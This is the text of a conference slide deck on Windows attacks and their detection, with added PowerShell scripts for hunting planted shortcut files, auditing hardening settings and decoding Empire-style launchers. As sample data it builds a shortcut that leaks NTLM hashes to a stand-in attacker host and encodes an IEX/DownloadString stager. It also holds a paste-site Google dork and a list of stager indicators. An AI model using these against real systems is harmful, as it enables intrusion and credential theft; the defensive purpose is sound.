NIC 2017 - Attack and detection in Windows Environments

Presentation I gave during NIC 2017 #NICConf.
1. Attack & Detection in Windows Environments

2. WHOAMI /ALL
• Chief Technical Architect – Microsoft Security
• Most Valuable Professional
• Microsoft Certified Trainer
• GIAC Certified Penetration Tester
• Microsoft infrastructure and security expert (security researcher)
• 15+ years with Microsoft technology
• http://oddvar.moe
• I like memes and gifs
@oddvarmoe

3. My favorite Hollywood hack scene

4. My goal with this session
• Give examples of real-world attacks
• Show my favorite external attacks
  • NTLM hash
  • Phishing mail
  • OWA rules
• Show internal reconnaissance
• Countermeasures and detection methods
• Think Assume Breach!

5. Who is attacking?
• 2 types of attackers: VISIBLE ATTACKERS and INVISIBLE ATTACKERS

6. Attack methodology
• Open Source Intelligence
  • Homepage – metadata
  • Social media
  • Password dumps
  • Google dorks
  • Shodan
• Social engineering and spear phishing
• Drive-by attacks
• Brute force / wordlist
• Exploiting external servers
• Alternate attack paths
• 3rd party

7. Attackers' goal
• Steal intellectual property
• Abuse infrastructure
• Strategic goal
• Disclose
• Great example: Phineas Fisher – Hacking Team – 2015
  • http://pastebin.com/0SNSvyjJ
  • https://www.youtube.com/watch?v=BpyCl1Qm6Xs

8. Attack kill chain
• Average attacker dwell time before detection: 140 days

9. Open source intelligence
Disclaimer: Accounts used in the following slides are just examples. It's illegal to use this information to log on.

10.–15. Open source intelligence examples (screenshots, no text)

16. http://haveibeenpwned.com

17. Other open source intelligence resources: SHODAN.IO

18. Other open source intelligence resources: DNSDUMPSTER.COM

19. Other open source intelligence resources: Google and pastebin
• "site:pastebin.com | site:paste2.org | site:paste.bradleygill.com | site:pastie.org | site:dpaste.com | site:paste.pocoo.org | site:pastie.textmate.org | site:slexy.org" intext:domainname.com

20. Other open source intelligence resources: SCRAPING HOMEPAGE - FOCA

21. Attack demos
• Gain access:
  • NTLM hash from picture
  • Sending attachments
  • Using OWA
• Escalate privileges:
  • Scan for local admin rights on other machines
  • Place LNK on share
  • Look through shares
• Persistence
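"NTLM hash from picture" and "Place LNK on share" work the same way under the hood: a Windows client is handed a UNC path (the source of an image, or the icon of a shortcut) that points at a host the attacker controls, and Explorer or the mail client authenticates to that host with NTLM as soon as it renders the object; nobody has to click anything. The PowerShell below is an added example, not code from the talk or from Empire: it hunts a share for .lnk files whose icon or target resolves to a UNC host outside an allowlist, and it builds two sample shortcuts in a temp folder (constructed for the demo) so it runs offline. The allowlist contents and the 10.0.0.5 address are assumptions.

```powershell
# Added example: hunt for shortcut files on a share that pull their icon or
# target from a UNC host you do not own. The host allowlist and the sample
# address 10.0.0.5 are assumptions for this demo.

function Get-SuspiciousLnk {
    param(
        [Parameter(Mandatory)] [string] $Path,   # share or folder to scan
        [string[]] $AllowedHosts = @()           # hosts that legitimately appear in UNC paths
    )
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $Path -Filter '*.lnk' -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $lnk = $shell.CreateShortcut($_.FullName)
            foreach ($field in 'IconLocation', 'TargetPath') {
                $raw = [string]$lnk.$field
                # IconLocation is "path,index"; keep only the path part
                $candidate = ($raw -split ',')[0].Trim()
                if ($candidate -match '^\\\\([^\\]+)\\') {
                    $uncHost = $Matches[1]
                    if ($AllowedHosts -notcontains $uncHost) {
                        [pscustomobject]@{
                            File    = $_.FullName
                            Field   = $field
                            UncHost = $uncHost
                            Value   = $raw
                        }
                    }
                }
            }
        }
}

# --- Constructed sample data: two shortcuts in a temp folder ----------------
function New-DemoShortcuts {
    $dir = Join-Path ([IO.Path]::GetTempPath()) ('lnkhunt-' + [Guid]::NewGuid())
    New-Item -ItemType Directory -Path $dir | Out-Null
    $shell = New-Object -ComObject WScript.Shell

    # Benign: icon and target are both local
    $ok = $shell.CreateShortcut((Join-Path $dir 'Notepad.lnk'))
    $ok.TargetPath   = 'C:\Windows\System32\notepad.exe'
    $ok.IconLocation = 'C:\Windows\System32\notepad.exe,0'
    $ok.Save()

    # Planted: icon served from an attacker-controlled host (assumed address).
    # Explorer loads the icon, and therefore authenticates to 10.0.0.5, the
    # moment someone opens the folder; the file never has to be clicked.
    $bad = $shell.CreateShortcut((Join-Path $dir 'Salary 2017.lnk'))
    $bad.TargetPath   = 'C:\Windows\System32\notepad.exe'
    $bad.IconLocation = '\\10.0.0.5\share\icon.ico,0'
    $bad.Save()

    return $dir
}

$demoDir = New-DemoShortcuts
# Against a real share: Get-SuspiciousLnk -Path '\\fileserver01\public' -AllowedHosts 'fileserver01','fileserver02'
Get-SuspiciousLnk -Path $demoDir -AllowedHosts 'fileserver01', 'fileserver02' | Format-Table -AutoSize
Remove-Item -Recurse -Force $demoDir
```

Only the planted "Salary 2017.lnk" is reported, with UncHost 10.0.0.5. Run it with an account that can read the shares but is not a local admin anywhere, and pair it with the "Lock down shares" and "block 445" items on the prevention slide: if clients cannot reach arbitrary hosts on TCP 445, the captured-hash trick fails even when a planted file is missed.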
22. Red Team Tool – PowerShell Empire
• Shoutout to
  • Will Schroeder - @harmj0y
  • Justin Warner - @sixdub
  • Matt Nelson - @enigma0x3
• www.powershellempire.com

23. DEMO – Gaining Access

24. Preventing these attacks
• OWA – use MFA
• Attachments on mail
  • Enable extra protection in GPO (block macros in Office files from the internet): https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/
• AppLocker / Device Guard
• Lock down shares
• Limit local admin rights
• Block client-to-client communication
• Make internet great again: block SMB (TCP 445) to the internet
• Net Cease: https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
• Test your security – you test your backup, don't you?
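An added example (not from the talk, and not the Net Cease script itself) that audits three of the controls above on the local machine: the Office 2016 policy behind the linked blog post, which sets blockcontentexecutionfrominternet under HKCU\Software\Policies\Microsoft\Office\16.0\<app>\Security; whether an enabled outbound Windows Firewall block rule for TCP 445 exists; and whether Net Cease has been applied, detected the way Net Cease itself works, by looking for the Authenticated Users ACE (S-1-5-11) in the DACL stored in the SrvsvcSessionInfo registry value. The list of Office apps and the 16.0 version path are assumptions; a domain GPO may deliver the same values.

```powershell
# Added example: audit three of the hardening settings listed on the slide.
# The Office app list and the 16.0 version path are assumptions; adjust them
# to your estate. Run elevated so the LanmanServer key is readable.

function Test-MacroBlockFromInternet {
    param(
        [string[]] $Apps = @('Word', 'Excel', 'PowerPoint'),
        [string]   $OfficeVersion = '16.0'
    )
    foreach ($app in $Apps) {
        $key   = "HKCU:\Software\Policies\Microsoft\Office\$OfficeVersion\$app\Security"
        $value = (Get-ItemProperty -Path $key -Name blockcontentexecutionfrominternet `
                      -ErrorAction SilentlyContinue).blockcontentexecutionfrominternet
        [pscustomobject]@{
            Check  = "Block internet macros ($app)"
            Pass   = ($value -eq 1)
            Detail = "$key\blockcontentexecutionfrominternet = $value"
        }
    }
}

function Test-Smb445OutboundBlocked {
    # Any enabled outbound block rule whose port filter covers remote TCP 445 counts.
    $rules = Get-NetFirewallRule -Direction Outbound -Action Block -Enabled True -ErrorAction SilentlyContinue |
        Where-Object {
            $pf = $_ | Get-NetFirewallPortFilter
            $pf.Protocol -eq 'TCP' -and (@($pf.RemotePort) -contains '445')
        }
    [pscustomobject]@{
        Check  = 'Outbound TCP 445 blocked'
        Pass   = (@($rules).Count -gt 0)
        Detail = (@($rules).DisplayName -join ', ')
    }
}

function Test-NetCeaseApplied {
    # Net Cease removes Authenticated Users (S-1-5-11) from the security descriptor
    # in SrvsvcSessionInfo, so NetSessionEnum stops answering ordinary domain users.
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
    $bytes = [byte[]](Get-ItemProperty -Path $key -Name SrvsvcSessionInfo).SrvsvcSessionInfo
    $sd    = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
    $aces  = @($sd.DiscretionaryAcl | Where-Object { $_.SecurityIdentifier.Value -eq 'S-1-5-11' })
    [pscustomobject]@{
        Check  = 'Net Cease (NetSessionEnum hardened)'
        Pass   = ($aces.Count -eq 0)
        Detail = $sd.GetSddlForm('All')
    }
}

Test-MacroBlockFromInternet
Test-Smb445OutboundBlocked
Test-NetCeaseApplied
```

A fresh Windows 10 / Office 2016 install fails all three checks, which is the point: none of these protections is on by default. The Net Cease check is a presence test only; if S-1-5-11 is absent from the DACL for some other reason it still reports a pass, so treat it as a quick inventory, not proof.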
25. Detecting the attacks
• Windows Defender ATP
• Microsoft Advanced Threat Analytics (user behavior)
• Exchange Online ATP
• Do a hunt
  • CimSweep is nice: https://github.com/PowerShellMafia/CimSweep
• Tripwire or Sysmon
• More logging! https://adsecurity.org/?p=3377
• IDS / IPS
• SIEM / OMS
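Much of the hunting in the detection demo comes down to spotting the Empire launcher, which by default starts powershell.exe with a hidden window and an -EncodedCommand whose payload downloads and runs the stager. The PowerShell below is an added example, not part of the talk, Empire or CimSweep: it pulls the base64 argument out of process-creation command lines (Sysmon event 1, or 4688 once "Include command line in process creation events" is on), decodes it as UTF-16LE, and flags stager indicators. The four sample events are constructed and 10.0.0.5 is an assumed attacker address; point it at Get-WinEvent on your collector instead of the sample array to run it on real data.

```powershell
# Added example: decode -EncodedCommand payloads from process-creation events
# and flag Empire-style stagers. Sample events are constructed; 10.0.0.5 is an
# assumed attacker address.

function Get-EncodedCommandPayload {
    param([Parameter(Mandatory)] [string] $CommandLine)
    # powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand
    if (-not ($CommandLine -match '(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})')) { return $null }
    $flag = $Matches[1].ToLower()
    $b64  = $Matches[2]
    if ($flag -ne 'e' -and $flag -ne 'ec' -and -not 'encodedcommand'.StartsWith($flag)) { return $null }
    try {
        # -EncodedCommand is base64 over UTF-16LE, not UTF-8
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))
    } catch { return $null }
}

$StagerIndicators = @(
    'Invoke-Expression', '\bIEX\b', 'Net\.WebClient', 'DownloadString', 'DownloadData',
    'FromBase64String',
    'ServicePointManager', 'Expect100Continue'   # boilerplate in Empire's HTTP stager
)

function Find-SuspiciousPowerShellLaunch {
    param([Parameter(Mandatory)] [object[]] $Events)
    foreach ($e in $Events) {
        $cmd = $e.CommandLine
        if ($cmd -notmatch '(?i)powershell') { continue }
        $decoded = Get-EncodedCommandPayload -CommandLine $cmd
        $hits = @()
        if ($cmd -match '(?i)-w(?:indowstyle)?\s+(?:1|hidden)') { $hits += 'hidden window' }
        if ($cmd -match '(?i)-nop(?:rofile)?')                  { $hits += 'no profile' }
        if ($decoded) {
            foreach ($pattern in $StagerIndicators) {
                if ($decoded -match "(?i)$pattern") { $hits += "payload: $pattern" }
            }
        }
        if ($hits.Count -gt 0) {
            $preview = ''
            if ($decoded) { $preview = $decoded.Substring(0, [Math]::Min(80, $decoded.Length)) }
            [pscustomobject]@{
                Time       = $e.Time
                Computer   = $e.Computer
                User       = $e.User
                Indicators = ($hits -join '; ')
                Decoded    = $preview
            }
        }
    }
}

# --- Constructed sample events (same fields as Sysmon event 1 / 4688) -------
$stager = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5:8080/index.asp')"
$enc    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stager))
$SampleEvents = @(
    [pscustomobject]@{ Time='2017-02-02 09:14:03'; Computer='WS-042';  User='CORP\alice';      CommandLine="powershell -noP -sta -w 1 -enc $enc" },
    [pscustomobject]@{ Time='2017-02-02 09:15:10'; Computer='WS-042';  User='CORP\alice';      CommandLine='powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Inventory.ps1' },
    [pscustomobject]@{ Time='2017-02-02 09:20:41'; Computer='SRV-FS1'; User='CORP\svc_backup'; CommandLine='powershell.exe -NonInteractive -Command "Get-Service"' },
    [pscustomobject]@{ Time='2017-02-02 09:31:22'; Computer='WS-017';  User='CORP\bob';        CommandLine='cmd.exe /c whoami /all' }
)

Find-SuspiciousPowerShellLaunch -Events $SampleEvents | Format-Table -AutoSize -Wrap
```

Only the first sample is reported, with indicators "hidden window; no profile; payload: \bIEX\b; payload: Net\.WebClient; payload: DownloadString". The decode step matters more than the regexes: without it a launcher shows up as an opaque blob and only the -w 1 / -noP flags give it away, and those are trivial for an attacker to drop. Feed the function from Get-WinEvent (Sysmon/Operational, Id 1, or Security, Id 4688) and extend the indicator list from the PowerShell logging guidance linked on the slide.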
26. DEMO – Detection

27. SUMMARY
• Assume breach
• Harden your stuff
• Get detection going
• Test your security
• Educate end users
• Do regular hunting

28. THANKS FOR YOUR TIME
http://oddvar.moe

29. Don't be like Trump: give me a green card when you exit
